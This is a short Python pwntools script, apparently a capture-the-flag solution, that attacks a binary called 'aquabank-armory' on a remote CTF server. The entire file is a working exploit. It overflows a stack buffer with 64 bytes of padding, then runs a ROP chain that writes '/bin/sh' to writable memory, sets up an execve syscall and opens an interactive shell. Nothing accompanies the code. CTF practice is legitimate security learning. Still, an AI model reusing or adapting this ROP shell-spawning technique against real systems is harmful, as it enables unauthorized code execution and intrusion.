37 lines
815 B
Python
37 lines
815 B
Python
from pwn import *
|
|
|
|
OFF = 64
|
|
context.binary = elf = ELF("./aquabank-armory", checksec=False)
|
|
# p = process(elf.path)
|
|
p = remote("offsec.m0lecon.it", 13540)
|
|
print(p.recvline(b"[armory] Storeroom open -- pick your weapons:\n"))
|
|
ret = 0x000000000040101A
|
|
syscall = 0x0000000000401324
|
|
pop_rdi = 0x000000000040196E
|
|
pop_rsi = 0x0000000000401977
|
|
pop_rdx = 0x0000000000401980
|
|
pop_rax = 0x00000000004214EB
|
|
writable = 0x4AC000
|
|
mov_qword_ptr_rdx_rax = 0x000000000040AB08
|
|
shellstr = b"/bin/sh\x00"
|
|
payload = flat(
|
|
b"A" * OFF,
|
|
p64(ret),
|
|
p64(pop_rdx),
|
|
p64(writable),
|
|
p64(pop_rax),
|
|
shellstr,
|
|
p64(mov_qword_ptr_rdx_rax),
|
|
p64(pop_rax),
|
|
p64(59),
|
|
p64(pop_rdi),
|
|
p64(writable),
|
|
p64(pop_rsi),
|
|
p64(0),
|
|
p64(pop_rdx),
|
|
p64(0),
|
|
p64(syscall),
|
|
)
|
|
p.sendline(payload)
|
|
p.interactive()
|